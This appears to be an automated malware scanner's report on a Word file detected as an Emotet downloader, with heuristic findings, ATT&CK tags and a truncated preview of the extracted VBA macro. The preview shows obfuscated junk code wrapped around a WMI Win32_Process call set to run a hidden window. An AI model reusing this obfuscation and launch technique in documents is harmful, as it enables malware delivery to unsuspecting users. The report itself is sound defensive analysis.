MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865935-0', indicating it's a downloader. Heuristics confirm the presence of a VBA macro with an AutoOpen function and a GetObject call, which are commonly used to execute malicious code. The VBA macro is likely responsible for downloading and executing a second-stage payload, consistent with Emotet's behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865935-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45503 bytes |
SHA-256: ff8adc948e68e80b589c2703e12aa179312e52fb6909e4a4504d68e329f88d47 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "k8_0801"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Q3_395"
Function m_7_3313()
Select Case O610694_
Case 856301476
P7945_ = (l__538 * Fix(686814843 / CBool(Z7960_9))) - h_9__2 / Oct(472587792) / 664872836 + CStr(S_4516) - 291702533 + ChrB(C_3_9_)
End Select
Select Case l3__989
Case 524506268
o3585_4_ = (Q4___916 * Fix(68779480 / CBool(H7349_91))) - m__33__ / Oct(756626926) / 238428477 + CStr(F6175__) - 961230301 + ChrB(X__9_3)
End Select
Select Case w_3_524
Case 134737171
j9_385 = (c299___ * Fix(652907553 / CBool(z_9200))) - c632_2_4 / Oct(681703735) / 928044950 + CStr(L5_7_40) - 325859610 + ChrB(p08339)
End Select
Select Case W25_8__
Case 787669236
h_1_1_6 = (I95_452_ * Fix(687291470 / CBool(S00_901))) - L2__8_ / Oct(679906984) / 59912940 + CStr(j17_1_24) - 80595103 + ChrB(I48_4_2)
End Select
Select Case R______
Case 697673231
D8_327_9 = (A_5857 * Fix(439689511 / CBool(N987_2__))) - Q_744__ / Oct(177295288) / 2996236 + CStr(P342950) - 322308665 + ChrB(c6_0381)
End Select
Select Case z_168300
Case 969917109
P88_47 = (D_64_5_ * Fix(540033466 / CBool(u_2786))) - A9_4_1 / Oct(28933302) / 856200009 + CStr(q25_5_4) - 946225785 + ChrB(G200672)
End Select
Select Case h655283_
Case 27785945
E3101__ = (I__82_ * Fix(46496789 / CBool(c__018))) - B2_1564 / Oct(922241155) / 216649713 + CStr(k_7_040_) - 636608685 + ChrB(I7987_)
End Select
End Function
Function w_5024(p84753, h62078)
On Error Resume Next
Select Case i28839_9
Case 295330195
w35_695 = (E4897__4 * Fix(933987790 / CBool(i1074_44))) - I_07415_ / Oct(175316490) / 802534161 + CStr(k978_17_) - 601088305 + ChrB(W__8__86)
End Select
Select Case T048_6
Case 123926770
R12194_ = (k_8___28 * Fix(576836159 / CBool(U146350_))) - a98__0_1 / Oct(962277199) / 900648578 + CStr(Q_9_9_) - 407868609 + ChrB(q0214__)
End Select
Select Case l_9665_4
Case 268175503
w112981_ = (C52891 * Fix(550412451 / CBool(v_6749))) - R20028 / Oct(651251203) / 271928447 + CStr(F477_380) - 660387921 + ChrB(o4684_39)
End Select
v1991998 = w5_34067 + "winmgmts:Win32" + Q_51_0_3 + "_ProcessStartup" + S72405
Select Case b__456
Case 196297070
w6_980__ = (C211__45 * Fix(344720736 / CBool(i_4277))) - R_63_1 / Oct(587232471) / 519637392 + CStr(b_10_0) - 989324233 + ChrB(F612_606)
End Select
Select Case V2954_
Case 306390112
w6462_ = (z6_919_4 * Fix(503136049 / CBool(Y7_31_6))) - C_09__67 / Oct(667162280) / 714373574 + CStr(d98217) - 366274017 + ChrB(C0_0_034)
End Select
F29__4 = i_0_04_2 + "winmgmts:Win32" + i_16__ + "_Process" + z510_1
Select Case s85917
Case 317721249
X066090 = (n_9_72 * Fix(241305419 / CBool(u29095))) - a5_0__ / Oct(351756757) / 251683363 + CStr(R938_9) - 772861227 + ChrB(i_1467)
End Select
Select Case w9297_
Case 507224544
M7_10016 = (u6_58279 * Fix(53614763 / CBool(A213_29))) - z645_3_ / Oct(411523928) / 351362613 + CStr(C_97_15) - 563892474 + ChrB(H765450_)
End Select
Select Case J__915
Case 808605171
q73654_ = (r5819_76 * Fix(91823898 / CBool(d94_2__))) - A9_10_ / Oct(328444458) / 289784531 + CStr(G5460_) - 504383416 + ChrB(v30373)
End Select
Set U9814_2_ = GetObject(A_12_92 + v1991998 + U__5062)
Select Case t_8419__
Case 982956485
w6_47_6 = (s2124_ * Fix(12320654 / CBool(w_63341))) - r39_5298 / Oct(35998885) / 572272312 + CStr(Q4151__) - 397465983 + ChrB(d25134)
End Select
Select Case z1342_4_
Case 689330272
N1_695 = (G_471193 * Fix(497901881 / CBool(q55____4))) - z147_948 / Oct(724819746) / 979894920 + CStr(n___92) - 167176566 + ChrB(m__0__41)
End Select
U9814_2_.ShowWindow = G23_1_ + 952579 - 952579 + U9___08
Select Case r__7_06
Case 529770445
F7_137 = (H299
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.